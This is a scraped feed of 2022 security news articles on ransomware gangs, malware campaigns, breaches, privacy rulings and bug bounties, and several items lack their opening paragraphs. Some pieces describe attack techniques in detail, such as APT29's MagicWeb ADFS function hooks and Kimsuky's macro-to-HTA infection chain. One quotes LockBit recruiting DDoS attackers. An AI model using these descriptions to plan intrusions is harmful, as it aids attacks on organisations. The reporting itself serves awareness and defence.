The Open Source Software Vulnerability Rewards Program (OSS VRP) will incentivize ethical hackers to make open source code more secure in major projects that Google maintains such as Golang, Bazel, Angular, Fuchsia and Protocol buffers.

The OSS VRP will specifically focus on all up-to-date versions of open source software and repository settings stored in the public repositories of Google-owned GitHub organizations, as well as these projects’ dependencies.

Google said it welcomes submissions of:

• Vulnerabilities that lead to supply chain compromise
•  Design issues that cause product vulnerabilities
•  Other issues such as sensitive or leaked credentials, weak passwords or insecure installations

“Depending on the severity of the vulnerability and the project’s importance, rewards will range from $100 to $31,337,” the tech giant said. “The larger amounts will also go to unusual or particularly interesting vulnerabilities, so creativity is encouraged.”

The OSS VRP will sit alongside Google’s VRPs in Chrome, Android and other parts of the business. Since the first was launched around 12 years ago, these programs have rewarded over 13,000 submissions and paid out more than $38m in the process.

Open source vulnerabilities are big news following the Log4Shell exploit and the subsequent fallout. Many DevOps teams now use third-party open source components to accelerate time-to-market for their offerings, but repositories often contain bugs.

One vendor detected a 650% year-on-year increase in attacks where threat actors have deliberately planted buggy code in upstream libraries so that they can exploit it at a later date.

Another report from June claimed that the average application development project contains 49 vulnerabilities spanning 80 direct dependencies. It added that time taken to fix open source vulnerabilities is almost 20% longer than in proprietary projects, and lengthened from 49 days in 2018 to 110 days in 2021.

Source

North Carolina in May and Florida in July put into effect laws that ban payment of ransoms in such cases, and more states are expected to follow suit with their own versions of such bans, Bankinfosecurity reports.

In the case of North Carolina, the new law requires immediate reports of any ransomware attacks to state authorities. In addition to banning payments, it bars victimized state agencies from talking to the attackers. Florida’ law doesn’t bar such communication, according to the report. Pennsylvania’s senate in January passed a ban on state agencies paying ransom, and like bans are being debated in Arizona, New Jersey, New York, and Texas, the Bankinfosecurity report says, citing reporting by CPO Magazine.

States are starting to consider such laws in response to a rising tide of ransomware attacks, many of which victimize private organizations but also target government agencies, including school districts.

And such attacks have multiplied rapidly in recent years as online thieves shift tactics to exploit weaknesses in victims’ defenses, allowing the attackers to realize payoffs not from the outright sale of stolen data but from demanding ransom payments from the victims. The problem is global. Some 79% of cybersecurity professionals around the world reported in April that their organizations had been hit by a ransomware attack in the past 12 months.

Meanwhile, the fraction of all data breaches that involve a ransom demand has ballooned from less than 1% of all breach incidents in 2016 to 21% last year, according to data from Risk Based Security Inc.

With such attacks, online criminals encrypt data stored by victim companies or agencies and then demand payment to supply the decryption key. Once obtained, the key may or may not unlock the data. The average ransom payment across all businesses globally is about $170,000, according to the security firm Sophos.

Source

From data about which cell towers your smartphone has been communicating with to your specific GPS coordinates, your smartphone constantly gives off a tremendous amount of information on your whereabouts, the letters from AT&T, Verizon and other carriers show.

For example, T-Mobile retains granular latitude and longitude coordinates of devices on its network for up to 90 days, and less-granular cell-site location data for up to two years, the company told the FCC in a letter dated Aug. 3. Verizon said it holds cell-site data for up to one year, while AT&T said it may retain cell-site data for up to five years.

The company letters highlight how telecom companies, and not just tech platforms, cooperate with government requests for personal information — an issue that's received intense scrutiny in recent months as new state laws restricting abortion have prompted critics to worry about cellular location data being used to prosecute abortion-seekers. In addition to sending official data requests to companies, government agencies have also resorted to simply buying personal data from the open market themselves, a practice US lawmakers have questioned authorities about this year.

That sensitive data, privacy advocates have said, can reveal whether a person may have visited an abortion clinic or sought other reproductive care, even if the location data was merely collected for the purposes of facilitating an unrelated call or mobile web search at the time.

"Governments collect information for many reasons. But, all too often, data collected by the state is misused and weaponized for other purposes," the Electronic Frontier Foundation, a digital rights group, wrote in a blog post this spring.

FCC Chairwoman Jessica Rosenworcel didn't explicitly mention potential risks related to reproductive care or abortion in her letters to more than a dozen top US wireless carriers in July. But the inquiries came less than a month after the Supreme Court's decision to overturn federal abortion rights in June, and amid heightened scrutiny of the many companies that handle location information and how they might respond to law enforcement requests for that data in connection with abortion prosecutions.

"Given the highly sensitive nature of this data — especially when location data is combined with other types of data, the ways in which this data is stored and shared with third parties is of utmost importance to consumer safety and privacy," Rosenworcel wrote at the time.

Last week, Rosenworcel added she has called on the FCC's enforcement bureau to investigate whether wireless carriers are doing enough to tell customers how their information is handled.

There are many reasons a wireless carrier collects location information from subscribers, the companies told the FCC. One main reason is simply to operate the network as consumers would expect. But there are other reasons, too. For example, FCC rules require that carriers provide detailed information to 911 dispatchers in an emergency, down to a device's likely elevation so that first responders can more easily locate someone in need if they are on the fifth floor of a building.

Carriers also collect location data for purposes that don't directly relate to the provision of wireless services. Verizon, for example, told the FCC it may use location data as part of an offering to third-parties that can "develop insights to help estimate traffic patterns during the morning rush hour or how many customers go to a retail store." AT&T told the FCC it may collect location information in order to serve subscribers targeted ads.

While in some cases consumers may be able to opt out of this data collection — such as with AT&T's advertising program — they generally cannot opt out of having their location data shared with law enforcement, the carrier letters said.

"Like all companies, we are required by law to provide information to law enforcement and other government entities by complying with court orders, subpoenas, and lawful discovery requests," AT&T wrote to the FCC. "In all cases, we review requests to determine whether they are valid."

Source

As play-to-earn games rise in popularity, scammers and threat actors increasingly target these new platforms for malicious activities.

Such is the case with a new malware distribution campaign discovered by cybersecurity researcher iamdeadlyz, where threat actors created a whole project to promote a fake play-to-earn game called Cthulhu World.

To promote the "project", threat actors are sending direct messages to users on Twitter asking if they would like to perform a test of their new game. In return for testing and promoting the game, iamdeadlyz says that the threat actors promise a reward in Ethereum.

When visiting the cthulhu-world.com site, which is now down, users are greeted with a well-designed website, containing information about the project and an interactive map of the game's environments.

However, this site appears to be a clone of the legitimate Alchemic World project, which has been warning users to stay away from the fake project.

The Cthulhu World website also has a big difference; when a user clicks on the arrow in the upper right-hand corner of the site, the visitor will bring them to a webpage asking for a code to download the "alpha" test of the project.

The threat actors share these codes with prospective victims as part of their DM conversations on Twitter. A list of the access codes is also found in the site's source code, as shown below.

Depending on the code entered, one of three files will be downloaded from DropBox.

Each of the three files installs a different malware, likely allowing the threat actors to pick and choose how they wish to target a particular user. The three malware identified by AnyRun installs are AsyncRAT, RedLine Stealer, and Raccoon Stealer.

The website for Cthulhu World is currently down, but their Discord remains active. It is unclear who on this Discord is aware that the site is distributing malware, but some users clearly believe this is a legitimate project.

As RedLine Stealer and Raccoon Stealer are known to steal cryptocurrency wallets, it is not surprising to find that some victims have already had their wallets cleaned out by this scam.

If you have visited Cthulhu-world.com and downloaded any of their software, you should immediately run an antivirus scan on your computer and remove anything detected.

Furthermore, as these malware infections steal your saved passwords, cookies, and crypto wallets, you should reset all passwords and create new wallets to import your cryptocurrency.

Ultimately, though, the wisest course of action is to reinstall your computer from scratch, as these malware infections provide full access to an infected computer, and other undetected malware may still be installed.

Source: BleepingComputer

https://www.bleepingcomputer.com/news/security/fake-cthulhu-world-p2e-project-used-to-push-info-stealing-malware/

The gang has recently suffered a DDoS attack, allegedly on behalf of digital security giant Entrust, that prevented access to data published on its corporate leaks site.

Data from Entrust was stolen by LockBit ransomware in an attack on June 18, according to a BleepingComputer source. The company confirmed the incident and that data had been stolen.

Entrust did not pay the ransom and LockBit announced that it would publish all the stolen data on August 19. This did not happen, though, because the gang’s leak site was hit by a DDoS attack believed to be connected to Entrust.

LockBit getting into DDoS

Earlier this week, LockBitSupp, the public-facing figure of the LockBit ransomware operation, announced that the group is back in business with a larger infrastructure to give access to leaks unfazed by DDoS attacks.

The DDoS attack last weekend that put a temporary stop to leaking Entrust data was seen as an opportunity to explore the triple extortion tactic to apply more pressure on victims to pay a ransom.

LockBitSupp said that the ransomware operator is now looking to add DDoS as an extortion tactic on top of encrypting data and leaking it.

“I am looking for dudosers [DDoSers] in the team, most likely now we will attack targets and provide triple extortion, encryption + date leak + dudos, because I have felt the power of dudos and how it invigorates and makes life more interesting,” LockBitSupp wrote in a post on a hacker forum.

Leaking Entrust data

The gang also promised to share over torrent 300GB of data stolen from Entrust so “the whole world will know your secrets.”

LockBit’s spokesperson said that they would share the Entrust data leak privately with anyone that contacts them before making it available over torrent.

It appears that LockBit has kept its promise and released this weekend a torrent called “entrust.com” with 343GB of files.

The operators wanted to make sure that Entrust's data is available from multiple sources and, besides publishing it on their site, they also shared the torrent over at least two file storage services, with one of them no longer making it available.

DDoS defenses

One method already implemented to prevent further DDoS attacks is to use unique links in the ransom notes for the victims.

“The function of randomization of links in the notes of the locker has already been implemented, each build of the locker will have a unique link that the dudoser [DDoSer] will not be able to recognize,” LockBitSupp posted.

They also announced an increase in the number of mirrors and duplicate servers, and a plan to increase the availability of stolen data by making it accessible over clearnet, too, via a bulletproof storage service.

After publishing this article, BleepingComputer learned that LockBit has made the stolen Entrust data available over clearnet, on a website that provides files for a limited period.

LockBit ransomware operation has been active for almost three years, since September 2019. At the time of writing, LockBit’s data leak site is up and running.

The gang is listing more than 700 victims and Entrust is one of them, with data for the company leaked on August 27.

Source: BleepingComputer

https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/

The legal case was launched by the copyright organization “LSG – Wahrnehmung von Leistungsschutzrechten GesmbH”, which convinced an Austrian court to block 14 websites for copyright law violations.

The problem arising from this measure is that the bans also extended to specific IP addresses belonging to Cloudflare servers that support many other sites that do not violate copyright laws.

Examples of impacted websites include Magenta, Salzburg AG, the Preis Zone shop, yesss!, Raiffeisen Mobil, SOS Mitmensch, and Hutchison Drei Austria GmbH.

As Austrian DerStandard comments in a report on the matter, the root of the problem is that the copyright organization provided a list of IP addresses that ISPs banned without checking who used them.

As it turned out, the list also included a set of at least nine IP addresses that Cloudflare uses for its CDN to provide services (security, reliability, performance) to legitimate websites.

104.31.16.119
104.26.12.95
172.67.175.231
188.114.97.12
104.21.88.201
188.114.96.12
104.21.69.123
104.21.6.167
104.21.36.27

According to the same outlet, Cloudflare has confirmed the problem and has notified affected customers.

At the moment, the list of banned addresses has been revised and the IPs listed above are no longer part of it.

BleepingComputer has contacted both Cloudflare and the intellectual property protection firm for a comment on the matter, and we will update this story as soon as we receive a response.

Meanwhile, tech-savvy Austrian users have found that using VPN tools helps circumvent the blocks, but this solution isn’t suitable for all users, and in most cases it comes with a price tag.

Source: BleepingComputer

https://www.bleepingcomputer.com/news/security/cloudflare-cdn-clients-caught-in-austrian-fight-against-pirate-sites/

As a state-sponsored cyberespionage actor, APT29 employs the new capability to hide their presence on the networks of their targets, typically government and critical organizations across Europe, the U.S., and Asia.

Dubbed ‘MagicWeb’, the new malicious tool is an evolution of ‘FoggyWeb’, which allowed hackers to exfiltrate the configuration database of compromised Active Directory Federation Services (ADFS) servers, decrypt token-signing and token-decryption certificates, and fetch additional payloads from the command and control (C2) server.

The MagicWeb’ tool replaces a legitimate DLL used by ADFS with a malicious version to manipulate user authentication certificates and to modify claims passed in tokens generated by the compromised server.

Because ADFS servers facilitate user authentication, MagicWeb can help APT29 validate authentication for any user account on that server, giving them persistence and an abundance of pivoting opportunities.

MagicWeb requires APT29 to first gain admin access to the target ADFS server and replace the said DLL with their version, but Microsoft reports that this has already happened in at least one case its Detection and Response Team (DART) team was called to investigate.

MagicWeb details

Microsoft observed NOBELIUM replace the “Microsoft.IdentityServer.Diagnostics.dll” with a backdoored version that features an additional section in the ‘TraceLog’ class.

This new section is a static constructor executed once during the loading of the DLL when launching the ADFS server.

The goal of the constructor is to hook four legitimate ADFS functions, namely “Build”, “GetClientCertificate”, “EndpointConfiguration”, and “ProcessClaims”.

The hooked functions enable the Russian hackers to perform the following actions:

• BeginBuild() - Subvert the normal certificate inspection/build process by introducing a custom method before invoked before “Build()”.
• BeginGetClientCertificate() - Force the application to accept a non-valid client certificate as valid, as long as the OID value matches either of the hardcoded MD5 values in MagicWeb.
• BeginEndpointConfiguration() - Allow WAP to pass the request with the specific malicious certificate to ADFS for further authentication processing.
• BeginProcessClaims() - Ensure that fraudulent claims with the MagicWeb OID value are added to the list of claims returned to the caller of the legitimate hooked method (ProcessClaims).

Hunting for MagicWeb

Microsoft recommends defenders to follow the hunting guidance provided in the report. Indicators of compromise (IoCs) have not been shared as they wouldn’t be very helpful.

“If MagicWeb is identified in your environment, it’s unlikely to match any static IOCs from other targets such as an SHA-256 value,” the company adds.

Additionally, searching for unsigned DLLs in GAC (Global Assembly Cache) using Microsoft 365 Defender or enumerating non-Microsoft signed DLLs in GAC via PowerShell, could help unearth malicious library replacements.

Source: BleepingComputer

https://www.bleepingcomputer.com/news/security/microsoft-russian-malware-hijacks-adfs-to-log-in-as-anyone-in-windows/

According to a Kaspersky report published today, the threat group has been employing new techniques to filter out invalid download requests since the start of 2022, when the group launched a new campaign against various targets in the Korean peninsula.

The new safeguards implemented by Kimsuky are so effective that Kaspersky reports an inability to acquire the final payloads even after they are successfully connected to the threat actor’s command and control server.

A multi-stage validation scheme

The attacks spotted by Kaspersky begin with a phishing email sent to politicians, diplomats, university professors, and journalists in North and South Korea.

Kaspersky was able to compile a list of potential targets thanks to retrieved C2 scripts containing partial email addresses of targets.

The emails contain a link that takes victims to a first-stage C2 server that checks and verifies a few parameters before delivering a malicious document. If the visitor doesn’t match the list of targets, they are served an innocuous document.

The parameters include the visitor’s email address, OS (Windows is valid), and the file “[who].txt” that’s dropped by the second-stage server.

At the same time, the visitor’s IP address is forwarded to the second-stage C2 server as a subsequent checking parameter.

The document dropped by the first-stage C2 contains a malicious macro that connects the victim to the second-stage C2, fetches the next-stage payload, and runs it with the mshta.exe process.

The payload is an .HTA file that also creates a scheduled task for auto-execution. Its function is to profile the victim by checking ProgramFiles folder paths, AV name, username, OS version, MS Office version, .NET framework version, and more.

The fingerprint result is stored in a string ("chnome"), a copy is sent to the C2, and a new payload is fetched and registered with a persistence mechanism.

The next payload is a VBS file that can take the victim to a legitimate blog or, if they’re valid targets, take them to the next payload-download phase.

“Interestingly, this C2 script generates a blog address based on the victim’s IP address. After calculating the MD5 hash of the victim’s IP address, it cuts off the last 20 characters and turns it into a blog address,” details Kaspersky.

“The author’s intent here is to operate a dedicated fake blog for each victim, thereby decreasing the exposure of their malware and infrastructure.”

This is when the victim’s system is checked for the existence of the unusual “chnome” string, which was purposefully misspelled to serve as a unique validator that still doesn’t raise suspicions.

Unfortunately, Kaspersky couldn’t continue from here and fetch the next stage payload, so whether that would be the final one or if there were most validation steps remains unknown.

Kimsuky is a very sophisticated threat actor recently seen deploying custom malware and using Google Chrome extensions to steal emails from victims.

The campaign highlighted by Kaspersky illustrates the elaborate techniques employed by the Korean hackers to hinder analysis and make their tracking much harder.

Source: BleepingComputer

https://www.bleepingcomputer.com/news/security/how-kimsuky-hackers-ensure-their-malware-only-reach-valid-targets/

The Room

A federal judge just sided with a Cleveland State University student, finding that anti-cheating software used by the institution that scanned his room was unconstitutional, NPR reports.

The creepy third-party "e-proctoring" tool, called Honorlock, asks students to get a virtual scan of students' rooms via a webcam.

The decision is significant, and could serve as a precedent for millions of students in the country. It's particularly relevant because the use of tools like Honorlock has taken off since the beginning of the COVID-19 pandemic, with many more students taking exams remotely than before.

Fourth Amendment

Now, US district court judge J. Philip Calabrese decided in chemistry student Aaron Ogletree's favor, arguing that these room scans go against his Fourth Amendment rights.

"Mr. Ogletree's privacy interest in his home outweighs Cleveland State's interests in scanning his room," Calabrese's ruling reads. "Accordingly, the Court determines that Cleveland State's practice of conducting room scans is unreasonable under the Fourth Amendment."

Civil rights attorney Matthew Besser called the decision a "landmark" in a blog post, writing that it was the "first in the nation to hold that the Fourth Amendment protects students from unreasonable video searches of their homes before taking a remote test."

Ogletree's complaints mirror those filed by other privacy advocates, who have long argued tools like Honorlock unfairly invade students' privacy.

Credit Score

Cleveland State University, however, maintained that remote virtual room scans don't amount to "searches" and that Ogletree could've opted out, resulting in getting zero credit for the exam.

But that defense didn't hold with Calabrese arguing that "rooms scans go where people otherwise would not, at least not without a warrant or an invitation."

"Nor does it follow that room scans are not searches because the technology is 'in general public use,'" he added in his verdict.

Source

Computer users may use the clipboard of the system for temporary storage: a password for entering it on a website, a file for moving it to another location on the system, or a bit of text found on a site for pasting in a Word document or a search engine.

Sites should never have access to the content of the clipboard, at least not without user permission. Chrome and other Chromium-based browsers have no such restriction currently. The makers of the Brave web browser considered adding the user gesture requirement in 2021, but this has not been implemented in the browser. The two other major browsers that do are not based on Chromium, Firefox and Safari, protect the clipboards of their users.

Visit the Webplatform News website to test your browser. All it takes is to visit the site and check the content of the clipboard afterwards.

If you get the following message in your clipboard, the browser is vulnerable to unauthorized clipboard manipulation:

Hello, this message is in your clipboard because you visited the website Web Platform News in a browser that allows websites to write to the clipboard without the user’s permission. Sorry for the inconvenience. For more information about this issue, see https://github.com/w3c/clipboard-apis/issues/182.

All Chromium-based browsers that are up to date are affected by this. Firefox and Safari do require a user gesture before websites may copy content to the device's clipboard. User gesture in this context means that the user is selecting content on the site and using Ctrl-C or other means to copy it to the clipboard.

A bug report on the Chromium website highlights that the restriction to require a user gesture before reading or writing to the clipboard has been removed. The reason given: it breaks NTP doodle sharing.

Adding user gesture requirement for readText and writeText APIs
breaks NTP doodle sharing. We are relaxing this check for now, but
we should fix this for sites to not rely on these APIs to be called
without a user gesture.

See NewTabPageDoodleShareDialogFocusTest.All test for more details.

NTP refers to the New Tab Page of the browser, doodles are Google Doodles, variations of the Google logo that highlight events or people.

On this GitHub page, the assumption is made that the user gesture requirement could break remote clipboard synchronization in browsers.

Now You: is your browser vulnerable?

Websites may write to the clipboard in Chrome without user permission

Last week, LockBit claimed responsibility for a ransomware attack on cybersecurity giant Entrust and began leaking the company's allegedly stolen data Friday evening.

Soon after leaking the data, LockBit's Tor data leak sites experienced a DDoS attack that made them inaccessible.

Researchers released reports this week on a Genshin Impact anti-cheat driver being abused to terminate antivirus processes during ransomware attacks and a new extortion group called Donut Leaks.

Finally, this week's ransomware attacks include DESFA, Center Hospitalier Sud Francilien (CHSF), Instituto Agrario Dominicano, and Bombardier Recreational Products (BRP).

Contributors and those who provided new ransomware information and stories this week include: @VK_Intel, @LawrenceAbrams, @jorntvdw, @billtoulas, @demonslay335, @PolarToffee, @Ionut_Ilascu, @Seifreed, @fwosar, @DanielGallagher, @struppigel, @BleepinComputer, @malwareforme, @serghei, @FourOctets, @malwrhunterteam, @TrendMicro, @GossiTheDog, @AlvieriD, @ValeryMarchive, @Cyberknow20, @VenezuelaBTH, @S0ufi4n3, @vxunderground, @AShukuhi, @pcrisk, and @ddd1ms.

August 20th 2022

New PT_Moisha ransomware

MalwareHunterTeam found a sample of the new PT_Moisha ransomware operation after users open a support topic in the BleepingComputer forums. The ransomware does not append a new extension to encrypted files and drops a ransom note named !!!READ TO RECOVER YOUR DATA!!! PT_MOISHA.html.

August 22nd 2022

LockBit ransomware blames Entrust for DDoS attacks on leak sites

The LockBit ransomware operation's data leak sites have been shut down over the weekend due to a DDoS attack telling them to remove Entrust's allegedly stolen data.

Greek natural gas operator suffers ransomware-related data breach

Greece's largest natural gas distributor DESFA confirmed on Saturday that they suffered a limited scope data breach and IT system outage following a cyberattack.

New Phobos variant

PCrisk found a new Phobos ransomware variant that appends the .KOPYTZEMPEREEBET extension.

New STOP ransomware variant

PCrisk found a new STOP ransomware variant that appends the .qqjj extension.

August 23rd 2022

New 'Donut Leaks' extortion gang linked to recent ransomware attacks

A new data extortion group named 'Donut Leaks' is linked to recent cyberattacks, including those on Greek natural gas company DESFA, UK architectural firm Sheppard Robson, and multinational construction company Sando.

French hospital hit by $10M ransomware attack, sends patients elsewhere

The Center Hospitalier Sud Francilien (CHSF), a 1000-bed hospital located 28km from the center of Paris, suffered a cyberattack on Sunday, which has resulted in the medical center referring patients to other establishments and postponing appointments for surgeries.

New Dharma ransomware variant

PCrisk found a new Dharma variant that appends the .zxcvb extension.

New STOP ransomware variant

PCrisk found a new STOP ransomware variant that appends the .qqkk extension.

August 24th 2022

Quantum ransomware attack disrupts govt agency in Dominican Republic

The Dominican Republic's Instituto Agrario Dominicano has suffered a Quantum ransomware attack that encrypted multiple services and workstations throughout the government agency.

RansomEXX claims ransomware attack on Sea-Doo, Ski-Doo maker

The RansomEXX ransomware gang is claiming responsibility for the cyberattack against Bombardier Recreational Products (BRP), disclosed by the company on August 8, 2022.

New STOP ransomware variant

PCrisk found a new STOP ransomware variant that appends the .qqpp extension.

New Scarab ransomware variant

PCrisk found a new Scarab ransomware variant that appends the .ZZZZZ extension.

New DonkeyHot ransomware

PCrisk found a new ransomware named 'DonkeyHot' that appends the .DONKEYHOT extension and drops a ransom note named #HOW_TO_DECRYPT#.txt.

August 25th 2022

Hackers abuse Genshin Impact anti-cheat system to disable antivirus

Hackers are abusing an anti-cheat system driver for the immensely popular Genshin Impact game to disable antivirus software while conducting ransomware attacks.

Cyberattack: misappropriation of provider account suspected at CHSF

According to our information, the investigators in charge of the cyberattack that led to the outbreak of the LockBit ransomware, last weekend, at the Sud-Francilien hospital center (CHSF), in Corbeil-Essonnes , currently suspect that the hijacking of a publisher's support account served as the initial intrusion vector.

August 26th 2022

An interview with initial access broker Wazawaka: ‘There is no such money anywhere as there is in ransomware’

Matveev talked to Recorded Future analyst and product manager Dmitry Smilyanets about his interaction with other hackers, details about ransomware attacks he’s been involved in, and how he settled on the name Babuk. The conversation was conducted in Russian and was translated to English with the help of linguists from Recorded Future’s Insikt group.

That's it for this week! Hope everyone has a nice weekend!

The Week in Ransomware - August 26th 2022 - Fighting back

The extension has been sitting on the Chrome Web Store since at least June 2019, according to the earliest reviews posted by users.

Although the extension may install a known and legitimate download manager program, BleepingComputer observed unwanted behavior exhibited by the extension—such as opening links to spammy sites, changing the default browser search engine, and further hounding the user with pop-ups asking them to download more "patches" and unwanted programs.

Dodgy Chrome extension installed by 200,000+ users

A concered BleepingComputer reader reached out to us on seeing a Chrome add-on "running malicious sites by impersonating famous software."

And their concern seems valid. The 'Internet Download Manager' browser extension installed by more than 200,000 users to date doesn't seem all that innocent.

There does exist a legitimate Windows program called Internet Download Manager, published by software company Tonec.

Tonec does offer Internet Download Manager extensions for Firefox and Chrome. But, the authentic Chrome extension provided by the company is called 'IDM Integration Module.'

Further, Tonec's FAQ specifically warns, "Please note that all IDM extensions that can be found in Google Store are fake and should not be used."

By contrast, the counterfeit 'Internet Download Manager' Chrome extension seems to be maintained by a website called "Puupnewsapp" that claims "it increases your download speed up to 500%" making it a "super software" for downloading games, movies, music, and "large files in minutes." Sounds promising.

The instructions provided by the knock-off extension are even more perplexing—why does one need to download and install multiple programs after installing the extension?

Specifically, upon installing 'Internet Download Manager,' users are now asked to install an executable from the puupnewsapp website, and additionally download a "Windows patch" ZIP file:

The 'idman638build25.exe' executable appears to be a valid, signed version of the legitimate Tonec Internet Download Manager.

The 'windows.zip' archive analyzed by BleepingComputer, contains both 32-bit and 64-bit versions of NodeJS, and executes JavaScript code to adjust Chrome and Firefox registry settings.

Alters search engines, promotes spam

What also stood out to us was that installing the extension in a test environment changed the default browser search engine to smartwebfinder[.]com. 

Frequent pop-ups urging the user to install more add-ons, such as for Firefox, were also observed, as was the extension launching third-party sites in the browser.

Luckily, reviewers, some from as early as 2019, seem to have spotted the dodgy behavior. Although plenty of (likely inauthentic) reviewers claim to have no issues with the extension.

BleepingComputer readers have previously reported issues with similar rogue extensions they'd found on the Chrome Web Store.

The particulars of the counterfeit extension are as follows:

BleepingComputer reached out to Tonec for comment, and we have also notified Google of the malicious extension prior to publishing.

"This is a fake extension and it should be avoided. Moreover it may contain spyware and adware," a Tonec spokesperson told BleepingComputer, referring to the counterfeit 'Internet Download Manager.'

"We report it to Google, but it appears again in a short time."

Tonec also urged users to download the aforementioned IDM Integration Module extension that has 20 million downloads on Chrome.

A quick search on the Chrome Web Store for "IDM," "IDM integration add-ons," or "Download Manager" will yield results containing extensions with hundreds of thousands of user installs, and favorable reviews that may appear promising.

While not all of these extensions may be harmful, users should be cautious when installing new Chrome extensions and verify if these are official versions published by trusted software vendors.

Source: BleepingComputer

https://www.bleepingcomputer.com/news/security/fake-chrome-extension-internet-download-manager-has-200-000-installs/

Until now, the only way to get a @duck.com email address was by joining a waitlist, and waiting for a few weeks or so for the notification to arrive.

What is DuckDuckGo's email protection service

DuckDuckGo's email protection is an email alias-service that hides your real email address. It allows you to create a custom @duck.com email address that collects mails that are sent to it. The service removes all trackers from the mail, including those that maybe hidden in images and scripts. Once it has purged the trackers, it forwards the mail to your main email's inbox. The company has announced that it now supports Link Tracking in mails to remove trackers from URLs. The service has been upgraded with Smarter Encryption, that replaces insecure HTTP links with HTTPS whenever possible.

How to get a @duck.com email address

Mobile users

If you have the DuckDuckGo mobile app on your Android mobile or iPhone, go to the Settings page and tap on Email Protection.

Desktop users

Do you prefer using it from your computer?  Then you will need to install the DuckDuckGo extension on Firefox or Chrome, and visit http://duckduckgo.com/email. macOS users can use the privacy service from the DuckDuckGo browser directly.

Click on the Get Started button, agree to the terms and services, and the website will prompt you to choose your @duck.com email address. Next, you will need to choose the email address to which your mails should be sent to, aka the forwarding address, e.g. your Gmail, Outlook email ID.

Note: You may change the forwarding address at anytime from the Email Protection dashboard.

DuckDuckGo's email protection does not require a password, when you try to log in to your account on a new browser or device, it will send an authentication code to your registered email address. Enter it to access your @duck.com inbox. Now, you can submit your new duck address in place of your main ID whenever you need to create accounts with third party services.

Go ahead and try sending an email to your new duck address, or try signing up for a newsletter on any website using it, you will receive the mails in your duck inbox. The mail that it forwards to you contain a banner alerting you that trackers were removed, it also has a link for an email protection report.

The service is not limited to email-forwarding, you can reply to mails that are sent to your @duck.com address, the sender will not be able to see your main email ID.

That's not all it can do, DuckDuckGo can also create unique private Duck addresses that you can use instead of your personal Duck ID. It's sort of like a temporary email ID. This adds another layer of privacy protection. These unique addresses can be generated from the dashboard. If you start receiving spam or phishing mails, you can deactivate this address, and create a new one to replace it. Using an email-alias can protect your real ID from being harvested by websites, spam, leaks, data breaches, etc.

Here are some free alternatives for DuckDuckGo email protection: SimpleLogin, AnonAddy, and Firefox Relay.

Which email alias-service do you use?

DuckDuckGo's email protection service is now available for all users

Some DoorDash customers have had their personal details stolen as part of a successful phishing campaign.

The company has confirmed that it recently detected unusual and suspicious activity on the computer network of a third-party vendor it works with. The stolen credentials of an employee at the vendor were used to access some of DoorDash's internal tools, which in turn allowed an unauthorized party to access customer and Dasher personal details(Opens in a new window).

Only a "small percentage of individuals" are thought to be affected, but DoorDash says the names, email addresses, delivery addresses, and partial payment card information (last four digits of a card number) of customers was accessed. No passwords, bank account numbers, full payment card details, social security, or social insurance details were compromised, however. For Dashers, the information accessed was limited to names, phone numbers, and email addresses.

DoorDash says it has already notified affected customers and set up a dedicated call center to answer any questions they may have. The company doesn't believe any of the information has been used for fraud or identity theft, but asks that customers take the usual advice of being cautious when receiving "unsolicited communications" or being asked to click suspicious links.

DoorDash is now working with the third-party vendor to enhance its security system while also talking to a cybersecurity expert for "additional expertise and support." Perhaps DoorDash should insist that all third-party vendors it works with start using security keys to foil phisihing attacks.

Source

In a blog post, CEO Karim Toubba has stated that signs of unusual activity in its development environment were detected two weeks ago. Following this, the company immediately went into containment mode, deployed mitigation measures, partnered with a cybersecurity company, and began a detailed investigation.

Although this investigation is ongoing, Toubba says that no signs of access to user data or encrypted password vaults have been detected at this time. Only snippets of the LastPass' source code and proprietary technical documentation has been stolen.

LastPass is yet to reveal the details about this breach occurred in the first place, but for now, it has stated that an "unauthorized party" managed to gain access to portions of its development environments by compromising a single developer account.

The firm has emphasized that no customer data, Master Passwords, or user vaults have been breached because developer accounts don't have access to this information either. As such, it has recommended no user or administrative action at this point but says that it will continue providing updates as more details emerge.

For those keeping count, this is the second high-profile cybersecurity incident we have covered this week. Plex recently confirmed that its database has been breached too, with emails, usernames, and encrypted passwords being stolen.

LastPass confirms breach, says user data is safe

But before DNS, navigating the Internet was a gruelling task. In the early days, messages were manually sent from network to network, using a series of IP addresses. The rapid growth of the Internet caused massive problems when it came to maintaining records of these addresses and, given there are now over 360 million domain name registrations, this method was unsustainable.

To address this issue, the DNS was created to provide an easy way of navigating the Internet and connecting users to websites - using domain names. Now, instead of humans acting as a switchboard for the Internet, the DNS is there to direct them to where they need to go. 

But what does DNS mean(opens in new tab), and what role does it play in keeping organisations protected?

Introducing the Domain Name System 

The Domain Name System (DNS) is the hierarchical decentralized naming system, created over thirty-five years ago to provide interconnectivity between online systems and the routing protocols for Internet traffic. In other words, every device connected to the Internet has its own unique IP address. 

The DNS makes it possible to input normal words into your browser, without having to memorize long and often complex IP addresses. Essentially, a DNS server(opens in new tab) is a database full of public IP addresses and it acts like a phone book of the Internet, with entries added, deleted, and amended in real-time every second in a transparent manner. 

Whenever you type a domain name in your URL bar, the DNS will find the corresponding IP address and direct you to where you need to go. So why is it important? DNS can be considered one of the cornerstones of the Internet. After all, if a DNS can’t find the correct IP address, you simply won’t be able to access the website you’re looking for. 

However, the foundational importance of the DNS makes it a major target for criminals and there is an ever-present and increasing threat to businesses of all sizes. The loss of control of a critical domain name or a website being unavailable even for a short period will cause revenue and reputational damage for organizations.

Volume and variety of DNS attacks increased

Over the last two years, we’ve seen a huge rise in the demand for bandwidth, as the world adapts to new ways of working; with the DNS system now handling over 2 trillion queries every day. But alongside an increase in legitimate DNS queries, there has been an unwelcome increase in malicious activity, with criminals looking to compromise DNS infrastructure for their own personal and financial gain. 

There has been a significant rise in DDoS attacks(opens in new tab). These attacks target the DNS infrastructure of organizations or DNS providers with huge volumes of DNS queries to prevent legitimate requests from reaching web servers and accessing websites and online services. 

While the nature of attacks has changed, the traditional threat of DNS hijacking or cache poisoning is still a real and legitimate threat.

These attacks are based on criminals gaining access to DNS databases and changing the IP address so that legitimate website traffic using a particular domain name is redirected to another website, often without the user recognizing there is an issue. Recently, cryptocurrency exchange Curve Finance was the victim of hackers hijacking its DNS. The company lost over $570,000 to criminals who redirected its traffic to their own website. 

Organizations must ensure that key infrastructure is protected in a world of increasing digital threats. Having robust security policies that encompass the use, and protection, of domain names as key digital assets is vital. 

Protecting your websites from attack  
